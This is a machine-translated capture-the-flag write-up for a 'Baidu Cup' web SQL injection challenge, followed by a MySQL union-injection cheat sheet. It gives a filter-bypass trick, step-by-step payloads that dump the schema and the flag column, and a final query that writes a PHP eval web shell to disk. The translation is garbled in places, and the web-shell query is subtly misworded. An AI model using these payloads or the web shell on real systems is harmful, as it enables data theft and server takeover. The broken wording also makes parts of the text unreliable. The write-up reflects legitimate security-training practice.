"Baidu Cup" CTF game September Course Web-SQL

Visit web site title

• Get tips: flag{在数据库中}, and the URL is xxx.ichunqiu.com/index.php?id=1in line with sql injection form.

• Conventionally view source, prompt SELECT * FROM info WHERE id=1, a digital-type implantation

Looking for loopholes

• ?id = 1 and 1 = 1: Tips inj code!, several tests and found the filter and, or, select, order,

• Gangster wp query that way around here in the middle of a sensitive word to join <>, then you can manually injected normal.

Gets flag

1. ?id = 1 ord<> by 3: Echo normal, indicating that the three fields inquiries

2. ?id = 1 union sel<>ect 1, 2, 3: 2 echo appears, indicating that the loopholes in the second field

3. Gets the database name
   ?id=1 union sel<>ect 1, database(), 3: Echo database called sqli

4. Gets the table name
   ?id=1 union sel<>ect 1, table_name, 3 from information_schema.tables where table_schema=database(): echo table name: info, users

5. Gets the field
   ?id=1 union sel<>ect 1, column_name, 3 from information_schema.columns where table_name='info': echo fields: id, title, flAg_T5ZNdrm

6. Obtaining flag
   ?id=1 union sel<>ect 1, flAg_T5ZNdrm, 3 from infoto get flag.

mysql union select injected Review

1. union statement must ensure the same before and after the query field, it is generally the first number of fields by blasting order by. (E.g., four fields)
   order by 4

2. Blasting field position, position in which to view the loopholes
   union select 1,2,3,4

3. Blasting database information using the built-in functions: version () database () user () @@ global.version_compile_os
   union select version(),database(),user(), @@global.version_compile_os

4. Violence Library: mysql> 5.0 has built-in library information_schema, stores all the built-in libraries and mysql table structure information.
   Query existing database:
   union select 1,2,3,schema_name from information_schema.schemata

5. Violence Library: Guess table
   union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

6. Violence Library: Guess field
   union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='表名'

7. Violence Library: Guess content
   union select 1,2,3,字段名 from 表名 limit 0,1

8. Write directly to Ma
   Condition 1: know the physical path Site
   Condition 2: There is a large enough privileges
   condition 3: magic_quotes_gpc () = OFF
   select '<?php eval($_POST[cmd]);?>' into file 'D:\\out.php'

================================================================

White grew note, Gangster please advice.